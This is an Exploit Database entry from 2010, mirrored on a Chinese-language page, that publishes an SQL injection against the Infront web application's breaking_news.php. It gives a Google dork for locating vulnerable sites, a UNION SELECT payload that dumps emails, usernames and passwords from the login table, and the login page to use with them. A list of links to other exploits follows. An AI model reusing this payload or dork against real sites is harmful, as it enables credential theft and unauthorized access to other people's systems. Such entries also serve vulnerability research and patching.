Infront – SQL Injection

Exploit Database
10 阅读

作者： TheMaStEr

日期： 2010-06-12
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/13848/

# Exploit Title: Infront SQL Injection Vulnerability
# Date: 12-06-2010
# Author: TheMaster <v4m@hotmail.de>
# Software Link: http://www.infront.com/
# Version: N/A
# Tested on: Windows XP SP3

Author : TheMaster <v4m@hotmail.de>
Dork : intext:Powered by Infront
Type of attack : SQLi
File : breaking_news.php
Exploit Code : http://target/path/breaking_news.php?newsid=union select 1,2,3,concat(email,0x3e,user,0x3e,pass),5,6+FROM+login

After , you can login here : http://target/path/login.php

demo : http://server/breaking_news.php?newsid=-103+UNION+SELECT+1,2,3,concat(email,0x3e,user,0x3e,pass),5,6+FROM+login--

GreeTz : SA H4x0r <Abu Saud> , HiV Sec Team , Sec4ever and v4-Team Members

last Exploits
Infront – SQL Injection的更多信息

Optergy 2.3.0a – Username Disclosure：
ManageEngine ADSelfService Plus 4.4 – POST Manipulation Security Question：
CMS Made Simple 2.2.5 – (Authenticated) Remote Code Execution：
Interspire Email Marketer – Cross-Site Scripting / HTML Injection / SQL Injection：
Joomla! Component Address Book 1.5.0 – Local File Inclusion：
PHP-Nuke 8.0 -Web_Links Module – Blind SQL Injection：
Netsweeper 2.6.29.8 – SQL Injection：
Mantis Bug Tracker 2.3.0 – Remote Code Execution (Unauthenticated)：